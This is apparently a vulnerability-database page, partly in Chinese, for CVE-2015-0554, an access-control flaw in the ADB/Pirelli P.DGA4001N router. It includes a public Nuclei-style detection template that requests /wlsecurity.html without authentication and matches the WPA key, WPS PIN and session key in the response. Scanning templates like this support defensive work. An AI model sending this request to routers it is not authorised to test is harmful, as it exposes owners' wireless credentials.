CVE-2015-0554: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure

日期: 2025-08-01 | 影响软件: ADB Pirelli ADSL2 2+ Wireless Router PDGA4001N | POC: 已公开

漏洞描述

ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.

PoC代码[已公开]

id: CVE-2015-0554

info:
  name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
  author: daffainfo
  severity: critical
  description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/35721
    - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
    - http://www.exploit-db.com/exploits/35721
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C
    cvss-score: 9.4
    cve-id: CVE-2015-0554
    cwe-id: CWE-264
    epss-score: 0.38604
    epss-percentile: 0.9716
    cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adb
    product: p.dga4001n_firmware
  tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wlsecurity.html"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var wpapskkey"
          - "var WscDevPin"
          - "var sessionkey"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205f499dffc7265f43a88d878b167c22c589382ef2cb278da1167d11b5f47d4b16022100cdd9d9dc88b0c7e0f1c09e07421dc1440ad6e2f7eafdb73edc58169653df5024:922c64590222798bb761d5b6d8e72950

相关漏洞推荐